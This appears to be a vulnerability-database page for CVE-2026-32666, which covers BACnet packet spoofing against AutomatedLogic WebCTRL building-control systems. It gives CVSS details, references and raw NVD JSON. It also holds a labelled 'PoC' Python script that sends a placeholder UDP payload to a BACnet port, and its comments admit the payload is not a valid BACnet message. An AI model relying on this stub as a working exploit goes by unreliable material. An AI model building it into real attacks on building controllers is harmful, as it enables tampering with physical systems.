Security Vulnerability Report
CVE-2026-32666 CVSS 7.5 HIGH

CVE-2026-32666

Published: 2026-03-21 00:16:26
Last Modified: 2026-03-23 16:16:47

Description

WebCTRL systems that communicate over BACnet inherit the protocol's lack of network-layer authentication. WebCTRL does not implement additional validation of BACnet traffic, so an attacker with network access could spoof BACnet packets directed at either the WebCTRL server or the associated AutomatedLogic controllers. Spoofed packets may be processed as legitimate.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

AutomatedLogic WebCTRL (see the vendor's security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# Target configuration
TARGET_IP = "192.168.1.100"
BACNET_PORT = 47808


def send_spoofed_bacnet():
    """
    Proof of Concept for CVE-2026-32666

    This script demonstrates sending a raw UDP packet to a BACnet device.
    In a real scenario, the payload would contain a valid BACnet APDU to
    perform unauthorized actions (e.g., changing a setpoint).
    """
    sock = None
    try:
        # Create a UDP socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        # Construct a malicious BACnet payload (Example: Who-Is request or Write Property)
        # Note: Actual exploitation requires constructing a valid BACnet APDU.
        # This is a placeholder to demonstrate the network capability.
        payload = b"\x01\x00\x00\x00\x10\x00\x00"

        print(f"[*] Sending spoofed packet to {TARGET_IP}:{BACNET_PORT}")
        sock.sendto(payload, (TARGET_IP, BACNET_PORT))
        print("[+] Packet sent successfully.")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        # Only close the socket if it was actually created; otherwise a failure
        # in socket() would raise NameError here and mask the real error
        if sock is not None:
            sock.close()


if __name__ == "__main__":
    send_spoofed_bacnet()
```

References

- https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-078-08.json
- https://www.automatedlogic.com/en/company/security-commitment/
- https://www.cisa.gov/news-events/ics-advisories/icsa-26-078-08

Weakness: CWE-290

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-32666",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-21T00:16:26.220",
    "lastModified": "2026-03-23T16:16:47.220",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [
      {
        "sourceIdentifier": "[email protected]",
        "tags": ["unsupported-when-assigned"]
      }
    ],
    "descriptions": [
      {
        "lang": "en",
        "value": "WebCTRL systems that communicate over BACnet inherit the protocol's lack\n of network layer authentication. WebCTRL does not implement additional \nvalidation of BACnet traffic so an attacker with network access could \nspoof BACnet packets directed at either the WebCTRL server or associated\n AutomatedLogic controllers. Spoofed packets may be processed as \nlegitimate."
      },
      {
        "lang": "es",
        "value": "Los sistemas WebCTRL que se comunican a través de BACnet heredan la falta de autenticación de capa de red del protocolo. WebCTRL no implementa validación adicional del tráfico BACnet, por lo que un atacante con acceso a la red podría falsificar paquetes BACnet dirigidos tanto al servidor WebCTRL como a los controladores AutomatedLogic asociados. Los paquetes falsificados pueden ser procesados como legítimos."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-290"}]
      },
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-290"}]
      }
    ],
    "references": [
      {
        "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-078-08.json",
        "source": "[email protected]"
      },
      {
        "url": "https://www.automatedlogic.com/en/company/security-commitment/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-078-08",
        "source": "[email protected]"
      }
    ]
  }
}
```